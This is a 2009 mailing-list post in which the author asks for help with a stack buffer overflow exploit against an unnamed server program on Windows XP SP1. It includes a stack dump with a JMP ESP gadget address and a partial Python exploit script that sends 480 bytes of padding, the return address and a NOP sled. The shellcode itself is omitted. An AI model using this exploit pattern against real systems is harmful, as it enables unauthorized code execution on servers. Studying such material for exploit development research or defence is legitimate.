Metasploit mailing list archives
No room for shellcode
From: allendb760 at googlemail.com (DB Allen)
Date: Sat, 2 May 2009 17:31:04 +0100
It's not a specific metasploit question - but I did use metasploit to generate the shellcode :-). I'm trying to write an exploit for a popular server-based software but don't have room for the shellcode anywhere. Here is a copy of the stack (doing this on XP SP1, so no DEP):

    ************ *********** ********
    00A4FD40 41414141 AAAA
    00A4FD44 41414141 AAAA
    00A4FD48 41414141 AAAA
    00A4FD4C 41414141 AAAA
    00A4FD50 41414141 AAAA
    00A4FD54 77D718FC ??w   USER32.77D718FC -> JMP ESP
    00A4FD58 90909090 ????
    00A4FD5C 90909090 ????  -> ESP
    00A4FD60 90909090 ????
    00A4FD64 90909090 ????
    00A4FD68 4DEB6AFC ?j?M  -> Shellcode start (should be 317 bytes)
    00A4FD6C FFFFF9E8 ????
    00A4FD70 6C8B60FF ?`?l
    00A4FD74 458B2424 $$?E
    00A4FD78 057C8B3C <?|
    00A4FD7C 8BEF0178 x??
    00A4FD80 5F8B184F O?_
    00A4FD84 49EB0120 ?I
    00A4FD88 018B348B ?4?
    00A4FD8C 99C031EE ?1??
    00A4FD90 74C084AC ???t
    00A4FD94 20CAC107 ??    -> Shellcode goes tits up.
    00A4FD98 746E6320 xxxx  -> Normal program code (obfuscated)
    00A4FD9C 6C492072 xxxx
    00A4FDA0 6167656C xxxx
    00A4FDA4 7375206C xxxx
    00A4FDA8 64697265 xxxx  Pointer to next SEH record
    00A4FDAC 6F4C202E xxxx  SE handler
    00A4FDB0 206E6967 xxxx

The buffer is 480 bytes to cause the overflow. Here is the relevant bit of Python:

    import socket

    # JMP ESP XP SP1 (address of the USER32 gadget seen in the dump above)
    jmp_sp1 = '\xfc\x18\xd7\x77'
    user = 'USER '
    buff = "A" * 480          # 480 bytes of padding to reach the return address
    NOP = '\x90'
    # shellcode: the 317-byte payload generated with Metasploit (not reproduced in this post)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.2.4', XXXX))   # target port left as XXXX in the original
    s.recv(1024)                       # read the service banner
    while 1:
        s.send(user + buff + jmp_sp1 + NOP * 16 + shellcode + "\r\n")

I'm thinking that I can include the shellcode as part of the buffer and find a static JMP [ESP-xxx] in memory, that could send the execution flow back into the buffer and to the shellcode. Is this a normal method to choose? Also is it reliable across OSes of the same service pack? If there is a better way, I'd love to hear it.

Thanks,
DB
Current thread:
- No room for shellcode DB Allen (May 02)
- No room for shellcode egypt at metasploit.com (May 02)
- No room for shellcode Patrick Webster (May 03)
- No room for shellcode DB Allen (May 03)
- No room for shellcode H D Moore (May 03)
- No room for shellcode DB Allen (May 03)
- No room for shellcode H D Moore (May 03)
- No room for shellcode DB Allen (May 04)
- No room for shellcode Patrick Webster (May 05)
- No room for shellcode Patrick Webster (May 03)
- No room for shellcode egypt at metasploit.com (May 02)
- No room for shellcode Kim Guldberg (May 03)